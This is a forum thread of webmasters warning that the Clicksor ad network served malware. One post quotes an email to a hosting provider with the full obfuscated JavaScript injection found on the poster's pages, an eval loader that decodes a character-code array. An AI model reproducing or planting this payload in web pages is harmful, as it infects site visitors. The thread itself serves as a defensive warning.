Never Using Clicksor again. Malware Warning

darkmalice

Registered Member
Joined
May 18, 2012
Messages
75
Reaction score
27
I will never be using clicksor again, I am posting this to serve as a warning to other, my website has been blacklisted because a number of clicksor ads have served malware, I know this because it served it up to me as well.
Be careful if you are using clicksor.
 
Well they remove malware if you contact them... but otherwise they have a pretty bad reputation regarging this
 
Yup completely agree! clicksor filled my non-adult oriented site with porn and malware. Good thing I caught it before google or any other majors saw it.
 
I've never used it on my own sites but before I had adblock, I remember getting loads of virus warnings from my antivirus software whenever I visited any sites with clicksor ads.
 
First, if you remove all offending ads, you can go into Google webmasters and get your site reviewed to get it unblocked. It takes 1-3 days. Good Luck.

Now......getting to Clicksor.

Here is the e,mail I just sent to my host 15 minutes ago:


*****************************************************************
Hi,I recently found an exploit that came through my sites via the Clicksor ad network.
I cleaned the code off my pages and just spent all night deleting all Clicksor's ads from my network.
Once I found it, I went through all my Clicksor sites and the code was installed on every page I had a Clicksor ad on.
The code was not on any pages that were not running Clicksor ads.
My concern now is all sites on your servers that run Clicksor ads now have this code on their pages.


The meat of the code looks like this, I didn't think to save the whole thing until I only had the broken version left:


/*336988*/
try{window.document.body++}catch(gdsgsdg){dbshre=169;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,95,90,24,54,26,95,102,91,110,103,96,101,108,39,93,109,92,89,109,95,64,99,93,102,95,105,107,32,32,99,97,105,89,102,95,34,32,51,6,4,8,1,24,25,26,27,91,91,39,109,109,90,24,54,26,34,95,108,109,106,53,38,39,95,110,107,37,111,94,92,94,105,93,90,110,100,102,102,108,97,109,102,109,105,40,94,102,101,40,106,92,112,101,94,104,111,38,106,94,102,41,103,96,105,33,54,4,2,25,26,27,23,92,92,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,94,94,37,107,109,115,103,92,38,91,105,109,91,93,107,26,56,23,31,41,33,54,4,2,25,26,27,23,92,92,40,110,107,113,101,95,41,95,93,98,97,99,107,24,54,26,34,40,104,113,33,54,4,2,25,26,27,23,92,92,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,91,91,39,109,111,112,100,94,40,103,92,94,109,26,56,23,31,42,106,115,30,51,6,4,27,23,24,25,94,94,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,93,93,34,32,33,25,117,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,113,109,96,108,94,34,34,51,92,98,112,27,96,92,54,86,34,91,91,85,33,57,51,39,93,99,113,53,31,34,53,8,1,24,25,26,27,23,24,25,26,95,102,91,110,103,96,101,108,39,97,96,107,61,101,95,104,92,102,109,60,116,64,92,33,33,95,90,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,92,92,35,54,4,2,25,26,27,23,117,6,4,120,32,32,34,53);s="";for(i=0;i-474!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq-(i%5-5-4));}z=s;e(s);}
/*/336988*/




This version didn't load correctly and actually displayed on my pages which is how I saw it.
It wrote to my pages correctly on all my wordpress installations.


But the version above actually tried to worm its way backward through a php include and install on the js page I was calling. That's why it didn't write correctly. Some of the code got stripped away.


I believe whoever did this blasted a one time occurrance through Clicksor's entire network.
I notified Clicksor but this is a second occurrance within 30 days.
They only said they were blocking that advertiser from my sites. (not the network)


So I just removed all their ads and hope you have means to check for this code within your servers.
***************************************************************

I also sent an email to Clicksor but don't expect anything from them.

STAY AWAY FROM CLICKSOR!!!!!!!
 
Last edited:
LOL clicksor team is here on blackhatworld promoting their sh1tty network to everyone.
Here's a good review of clicksor by google safebrowsing: google(dot)com/safebrowsing/diagnostic?site=clicksor.com
 
I have never used Clicksor but as I see your warning, I would steer as far away from them as possible. Thanks for the heads-up.
 
I've never used it on my own sites but before I had adblock, I remember getting loads of virus warnings from my antivirus software whenever I visited any sites with clicksor ads.
 
Clicksor is slowly becoming scam site so stay away from them.
If you don't get enough traffic then after 3-4 months they will cancel your account by giving shitty reasons.
So i advice all my friends to request your pending amount and say bye-bye to them. It will be a lesson for them..
 
You're talking from a publisher's point of view? If so I agree with you. But let's see the benefits in being an advertiser at clicksor since they don't care what you promote.
 
Back
Top